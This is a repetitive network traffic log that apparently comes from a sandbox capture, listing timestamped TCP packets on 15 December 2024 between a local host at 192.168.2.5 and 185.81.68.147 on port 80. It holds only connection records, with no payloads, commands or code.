                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.783659935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.783907890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.783984900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.784792900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.784859896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.784931898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.786015987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.786072016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.786143064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.787122965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.787350893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.787424088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.788311958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.788394928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.788477898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.789467096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.789582014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.789654016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.790652037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.790818930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.790899038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.791770935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.791902065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.791982889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.792963982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.793052912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.793139935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.794212103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.794312954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.794403076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.795281887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.795407057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.795500994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.796504974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.796591043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.796673059 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.797631979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.797771931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.797849894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.798768997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.798861980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.798943043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.799923897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.800031900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.800107956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.801075935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.801162958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.801239014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.802223921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.802334070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.802422047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.803390980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.803527117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.803597927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.804548979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.804605961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.804677010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.805855036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.805917025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.805991888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.806864023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.806972980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.807044983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.808043957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.808132887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.808214903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.809415102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.809509039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.809588909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.810359955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.810456991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.810537100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.811525106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.811669111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.811753035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.812680006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.812796116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.812865973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.813836098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.813951015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.814023972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.815166950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.815188885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.815274954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.816165924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.816261053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.816334963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.817331076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.817403078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.817488909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.818519115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.818648100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.818720102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.819684029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.819766045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.819834948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.820873022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.820965052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.821033001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.821973085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.822083950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.822153091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.823177099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.823260069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.823343992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.824290037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.824390888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.824460983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.825488091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.825591087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.825704098 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.826733112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.826831102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.826913118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.827804089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.827900887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.827990055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.828964949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.880037069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.960051060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.960211039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.960326910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.960381985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.960391045 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.960427046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.961460114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.961589098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.961678028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.962629080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.962697983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.962785006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.963792086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.963895082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.963977098 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.964945078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.965110064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.965189934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.966104984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.966263056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.966351032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.967271090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.967382908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.967466116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.968446970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.968525887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.968605995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.969609022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.969696999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.969774961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.970789909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.970868111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.970948935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.971923113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.972094059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.972173929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.973073959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.973197937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.973277092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.974230051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.974380016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.974451065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.975388050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.975523949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.975591898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.976561069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.976703882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.976789951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.977725029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.977907896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.977982044 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.978876114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.978984118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.979054928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.980096102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.980223894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.980307102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.981204987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.981374025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.981452942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.982366085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.982422113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.982511997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.983536005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.983603954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.983694077 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.984684944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.984751940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.984822989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.985861063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.986021996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.986149073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.987015009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.987188101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.987306118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.988173962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.988327980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.988404036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.989331961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.989445925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.989516020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.990483999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.990586042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.990653038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.991698980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.991830111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.991897106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.992822886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.992944956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.993014097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.993976116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.994139910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.994210958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.995126009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.995239973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.995307922 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.996287107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.996423960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.996458054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.997507095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.997615099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.997658968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.998615980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.998722076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.998758078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.999773979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.999842882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.999876976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.001043081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.001137972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.001174927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.002127886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.002218008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.002254963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.003293991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.003443003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.003480911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.004446983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.004547119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.004584074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.005604982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.005711079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.005749941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.006767988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.006858110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.006891966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.007993937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.008075953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.008126020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.009068012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.009231091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.009265900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.010246992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.010359049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.010401964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.011548042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.011630058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.011662006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.012578011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.012830019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.012867928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.013722897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.013777971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.013822079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.014894009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.015019894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.015060902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.016057014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.016176939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.016211033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.017199993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.017303944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.017349958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.018415928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.018481970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.018517971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.019507885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.019609928 CET8049708185.81.68.147192.168.2.5
